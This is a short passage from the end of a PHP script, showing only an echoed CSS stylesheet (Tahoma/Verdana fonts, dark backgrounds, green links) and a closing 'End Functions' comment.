font-size: 11px;
color: #ffffff;
line-height: 150%;
margin-top: 0;
margin-left: 0;
margin-bottom: 0;
margin-right: 0;
}
.smlfont
{
font-family: Tahoma;
font-size: 11px;
}
.INPUT
{
font-family: verdana;
FONT-SIZE: 11px;
COLOR: #ffffff;
BACKGROUND-COLOR: #666666;
height: 18px;
border: 1px solid #ffffff;

padding-left: 1px;
padding-right: 1px;
padding-bottom: 1px;
padding-top: 1px
}
.td
{
font-family: Tahoma;
font-size: 11px;
color: #ffffff;
border: 1px solid #ffffff;
}
.ccfont
{
color: #cccccc
}
.top
{
BACKGROUND-COLOR: #222222
}
.firstalt
{
BACKGROUND-COLOR: #000000
}
.secondalt
{
BACKGROUND-COLOR: #000000
}
a:link, a:visited, a:active {color: #00FF00; text-decoration: underline;}
a:hover {color: #FFFFFF; text-decoration: none;}
</style>';
}
################ End Functions ###############
?>